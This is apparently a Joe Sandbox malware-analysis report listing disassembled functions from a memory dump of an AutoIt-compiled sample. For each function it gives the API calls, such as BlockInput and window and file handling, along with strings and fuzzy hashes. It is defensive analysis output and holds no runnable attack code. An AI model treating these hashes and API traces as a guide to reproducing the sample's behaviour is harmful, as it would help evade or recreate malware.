Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 52be7b233c7b79c546447001bb7f2946e522f53ef1c1813f73e8fe13f0f67983
Instruction ID: 4d046e691dd763df3e6b162e3c79d1f452214a7dcebb0f8326af6d7edd24297f
Opcode Fuzzy Hash: 52be7b233c7b79c546447001bb7f2946e522f53ef1c1813f73e8fe13f0f67983
Instruction Fuzzy Hash: 09126275D202199BDB25CF58C8906AEB7F5FF48710F14819AE809EB292DB709E91CF90

Function 0026EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0026EABD

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 638fde6e44be36805f01958c777c23eb2d05696a004e9a8fa28a38cca9118140
Instruction ID: 118b746ef6dfef4ad6178046b6a2be2dc032ccb23b79b281aa7c40fb8268ffd2
Opcode Fuzzy Hash: 638fde6e44be36805f01958c777c23eb2d05696a004e9a8fa28a38cca9118140
Instruction Fuzzy Hash: 8BE048752102159FC710DF59D444D5AF7DDAF98760F118416FD45C7351D770EC408B90

Function 002109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002103EE), ref: 002109DA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ef5fe661e7a02b63be74215b8ae380095440eea22f0c9e7739f96b8330311dc0
Instruction ID: 11c8321a6477bdfd9d789b59a6d0871f47a16fd9d20d614b608eda67fb4356bd
Opcode Fuzzy Hash: ef5fe661e7a02b63be74215b8ae380095440eea22f0c9e7739f96b8330311dc0
Instruction Fuzzy Hash:

Function 0021781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0021798B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 3b467389a22abba383cf633d9547ecbdcfbb0a079e665db772cbbdab3a3d5ae3
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 7851476163C64756DB384D68889D7FE23F99FF2300F180519E882C7282C651DEFAE752

Function 00262046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&,, xrefs: 00262053

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: 0&,
API String ID: 0-707580741
Opcode ID: 5fa1803c7c7cf27dfd2b74c4f7634ace2716b2bb4058e2b4639c03340d691d9a
Instruction ID: 65bd347066969bf9a71b31c8afd65222b60378e66039993bea5d139eb4db908f
Opcode Fuzzy Hash: 5fa1803c7c7cf27dfd2b74c4f7634ace2716b2bb4058e2b4639c03340d691d9a
Instruction Fuzzy Hash: D721BB32620515CBD728CF79C81367E73E5A764310F25862EE4A7C37D0DE36A948CB50

Function 00226DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ee29e86e34cbdeebf18893d34620ecfcb7caefa7f251e8c283a7300d707686
Instruction ID: 90c4da551f1787b9bdfd3905cc32d92c2bbee4b0bc8afbe8b4ad3d6bf577bc43
Opcode Fuzzy Hash: 78ee29e86e34cbdeebf18893d34620ecfcb7caefa7f251e8c283a7300d707686
Instruction Fuzzy Hash: 49324322D3DF119DD7239A34EC66335A289AFB73C5F15D337E81AB59A6EB28C4934100

Function 0020CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492c320395181739e6203f0b51c8b15621b08331a8e73e7eb92583489167791a
Instruction ID: 4847259f2c6a5606a4364c69ab2dffaa159bda9f5f298ac1a23f23ee4eab514f
Opcode Fuzzy Hash: 492c320395181739e6203f0b51c8b15621b08331a8e73e7eb92583489167791a
Instruction Fuzzy Hash: B1322471A312168BDF6CCF2CC4D467D77A1EB45304F39866BD44A8B2A2D270DDA1DB00

Function 001F7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd43d7c65df41116d8313ccd00502e7684a118cbe5905c1b27a816ffc28950c
Instruction ID: d1e195192d6c586fa9f0d5aed7fd57f186aada7f34950bf6bd8440ffc0214a8d
Opcode Fuzzy Hash: 3cd43d7c65df41116d8313ccd00502e7684a118cbe5905c1b27a816ffc28950c
Instruction Fuzzy Hash: C522D3B0A1061ADFDF14CF64D881ABEB7F6FF44300F144629E916A7291EB36AD61CB50

Function 001F91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce2d48efedceadbf8374333b50622e3ef68c3864d10d83bed2fc81e52a7e6a1d
Instruction ID: 1fd03b5ed11b568db1d243c93b69fa301ed6f147ada2fdda92dbb967a1390638
Opcode Fuzzy Hash: ce2d48efedceadbf8374333b50622e3ef68c3864d10d83bed2fc81e52a7e6a1d
Instruction Fuzzy Hash: 2502D5B0A1020AEBDF04DF64D881AAEB7B5FF54300F118165E9169B2D1EB71AE65CF90

Function 00211C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 3b1e228c63c5813f53cbc71e98ff43b63d7f83313fb60a6d9cad681ca6046743
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C6918B722280A349DB2D4A7D95740BEFFE15A623A131A079ED5F2CB1C5FE30C5B4D620

Function 002119B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 4c6a6b35522c5e2f0af83bb30ea5f9eb71b7e96e4ac079a2fb3f5564870d0013
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 9D91977222D0A349DB2D4A7A85740BDFFE15AA23A531A079ED5F2CA1C1FD34C6F4D620

Function 00217A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc05cb4fb65cc86dbcafb2a3b225f3c45fe50808083dad9d0be6e842b0a3692
Instruction ID: b108de277d95bd524537298044de2e2a040f82f4fd390f8fcf160e9c7c8734ca
Opcode Fuzzy Hash: 8fc05cb4fb65cc86dbcafb2a3b225f3c45fe50808083dad9d0be6e842b0a3692
Instruction Fuzzy Hash: 4661576123C70B56DA349E288895BFE63F4DFF1708F24091AE842DB281DB519FF28755

Function 00211706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: d374c33ba3364e315a34504eddca4c9dda6e12e108fb8c12c22e0847b8064580
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: AF8188326290A30DEB6D4A3D85340BEFFE15AA23A131A479DD5F2CB1C1EE34C5B4D620

Function 00272ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00272B30
DeleteObject.GDI32(00000000), ref: 00272B43
DestroyWindow.USER32 ref: 00272B52
GetDesktopWindow.USER32 ref: 00272B6D
GetWindowRect.USER32(00000000), ref: 00272B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00272CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00272CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272CF8
GetClientRect.USER32(00000000,?), ref: 00272D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00272D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272D80
GlobalLock.KERNEL32(00000000), ref: 00272D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272D98
GlobalUnlock.KERNEL32(00000000), ref: 00272DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272DA8
GlobalFree.KERNEL32(00000000), ref: 00272DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0028FC38,00000000), ref: 00272DDB
GlobalFree.KERNEL32(00000000), ref: 00272DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00272E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00272E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00272E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027303F

Strings

static, xrefs: 00272D3A, 00272E91
, xrefs: 00272FC5
AutoIt v3, xrefs: 00272CF2
DISPLAY, xrefs: 00272EA2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: af02c2c9f73011f7b30fad80db32c38fa29e2a25221633a7c51142b169b21f67
Instruction ID: b5aa684d8ba823887e9fb490f0be4391fbd5fcde58becc68b6eb4b8207b765f4
Opcode Fuzzy Hash: af02c2c9f73011f7b30fad80db32c38fa29e2a25221633a7c51142b169b21f67
Instruction Fuzzy Hash: 75029975910209EFDB14DF64EC8DEAE7BB9EF49314F108158F919AB2A1CB74AD04CB60

Function 002870D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0028712F
GetSysColorBrush.USER32(0000000F), ref: 00287160
GetSysColor.USER32(0000000F), ref: 0028716C
SetBkColor.GDI32(?,000000FF), ref: 00287186
SelectObject.GDI32(?,?), ref: 00287195
InflateRect.USER32(?,000000FF,000000FF), ref: 002871C0
GetSysColor.USER32(00000010), ref: 002871C8
CreateSolidBrush.GDI32(00000000), ref: 002871CF
FrameRect.USER32(?,?,00000000), ref: 002871DE
DeleteObject.GDI32(00000000), ref: 002871E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00287230
FillRect.USER32(?,?,?), ref: 00287262
GetWindowLongW.USER32(?,000000F0), ref: 00287284

Part of subcall function 002873E8: GetSysColor.USER32(00000012), ref: 00287421
Part of subcall function 002873E8: SetTextColor.GDI32(?,?), ref: 00287425
Part of subcall function 002873E8: GetSysColorBrush.USER32(0000000F), ref: 0028743B
Part of subcall function 002873E8: GetSysColor.USER32(0000000F), ref: 00287446
Part of subcall function 002873E8: GetSysColor.USER32(00000011), ref: 00287463
Part of subcall function 002873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00287471
Part of subcall function 002873E8: SelectObject.GDI32(?,00000000), ref: 00287482
Part of subcall function 002873E8: SetBkColor.GDI32(?,00000000), ref: 0028748B
Part of subcall function 002873E8: SelectObject.GDI32(?,?), ref: 00287498
Part of subcall function 002873E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002874B7
Part of subcall function 002873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002874CE
Part of subcall function 002873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002874DB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: e0b76827bf825dadbd0a2051519dc7cb8f4cf137d37a5cb57ade7629402a07cc
Instruction ID: b15bf5977f70cc2e993eb11e8d159fc50e3e4a0c1926d852b11d84dfe4e7b31b
Opcode Fuzzy Hash: e0b76827bf825dadbd0a2051519dc7cb8f4cf137d37a5cb57ade7629402a07cc
Instruction Fuzzy Hash: 09A1A47601A301AFDB00AF60EC4CE5B7BA9FF49320F200A19F966961E1D775E954CF61

Function 00208D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00208E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00246AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00246AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00246F43

Part of subcall function 00208F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00208BE8,?,00000000,?,?,?,?,00208BBA,00000000,?), ref: 00208FC5

SendMessageW.USER32(?,00001053), ref: 00246F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00246F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00246FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00246FB7

Strings

0, xrefs: 00246DCF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: d52981a8cd476ffdb10064add8d17761a9afe5e3b59813473b010a2c271b5157
Instruction ID: 9d2c637ba1250925dfb3b92f890973d38297c9e754809531e0820d06276e595d
Opcode Fuzzy Hash: d52981a8cd476ffdb10064add8d17761a9afe5e3b59813473b010a2c271b5157
Instruction Fuzzy Hash: 08128C34621212DFDB29CF24D88CBA6B7E5FB46300F544469F5859B6A2CB31E871CF52

Function 00272711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0027273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0027286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002728A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002728B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00272900
GetClientRect.USER32(00000000,?), ref: 0027290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00272955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00272964
GetStockObject.GDI32(00000011), ref: 00272974
SelectObject.GDI32(00000000,00000000), ref: 00272978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00272988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00272991
DeleteDC.GDI32(00000000), ref: 0027299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002729C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002729DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00272A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00272A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00272A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00272A77
GetStockObject.GDI32(00000011), ref: 00272A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00272A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00272A97

Strings

static, xrefs: 0027294F, 00272A71
AutoIt v3, xrefs: 002728F8
DISPLAY, xrefs: 0027295A
msctls_progress32, xrefs: 00272A13

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 824aef5387ac193cb70d0f2e25e3df150efd9141875e72509cb10057aed64f6c
Instruction ID: 2803302f17836e34cfd0531b605120cf342ed44e368fcc616c3c4d904d42d229
Opcode Fuzzy Hash: 824aef5387ac193cb70d0f2e25e3df150efd9141875e72509cb10057aed64f6c
Instruction Fuzzy Hash: F3B18E75A10219AFEB14DF68DC8AFAE7BA9EF05710F108154FA14E72A1D774ED10CBA0

